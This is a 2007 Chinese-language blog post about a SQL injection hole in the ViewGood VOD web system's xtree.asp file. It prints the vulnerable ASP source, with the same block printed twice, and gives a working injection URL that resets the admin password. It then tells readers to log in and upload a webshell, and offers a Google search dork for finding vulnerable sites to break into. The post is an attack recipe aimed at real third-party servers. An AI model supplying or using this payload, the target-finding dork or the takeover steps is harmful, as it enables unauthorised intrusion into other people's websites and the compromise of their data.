远古VOD漏洞

    [雷阵雨 August 29, 2007 10:24 | by ]
冷漠PS:在惘然那看到的,昨天晚上测试成功,不过好多站点后台没有找到,稍微有点规模的站点后台都改了,或者就是漏洞被补了,据说是四月出的漏洞,到现在才被公布出来...大家在测试过程中,要注意开杀毒软件或者开虚拟机上测试吧..很多都被挂了马的...
漏洞文件webmedia/common/function/xtree.asp
〈!--#include file="../dbcon.inc.asp" -->
〈%
iNode_ID = Request.QueryString("id")

if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session("VODAdmin")) > 0 then
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" & iNode_ID
else
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" & iNode_ID
end if
rsData.Open szSQL,con,1,3
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
do while not rsData.EOF
szRetVar = szRetVar & "<TypeInfo>"
szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"
szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>"
szRetVar = szRetVar & "</TypeInfo>"
rsData.MoveNext
loop
szRetVar = szRetVar & "</Root>"
rsData.Close

Response.CharSet = "GB2312"
Response.ContentType = "text/xml"
Response.Expires = -1

Response.Write szRetVar
%>
〈!--#include file="../dbend.inc.asp" -->

〈!--#include file="../dbcon.inc.asp" -->
〈%
iNode_ID = Request.QueryString("id")

if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session("VODAdmin")) > 0 then
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" & iNode_ID
else
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" & iNode_ID
end if
rsData.Open szSQL,con,1,3
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
do while not rsData.EOF
szRetVar = szRetVar & "<TypeInfo>"
szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"
szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>"
szRetVar = szRetVar & "</TypeInfo>"
rsData.MoveNext
loop
szRetVar = szRetVar & "</Root>"
rsData.Close

Response.CharSet = "GB2312"
Response.ContentType = "text/xml"
Response.Expires = -1

Response.Write szRetVar
%>
〈!--#include file="../dbend.inc.asp" -->

很容易看出以上存在着DB权限注入

注射地址:http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1

表段名:customer

构造函数 把admin的pass改成fuck
http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass='633f94d350db34d5'%20where%20UserName='admin'



登陆后台 直接上传大马 完事!

测试方法:在google搜:    inurL:webmedia/       随便找个站都可以入侵

官方地址:http://www.viewgood.com/

Tags: ,
Technology | Comments(1) | Trackbacks(0) | Reads(12377)
djmonkey1
September 4, 2007 00:14
请问如何构造函数啊?能不能发个贴出来说明一下?
Pages: 1/1 First page 1 Final page
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive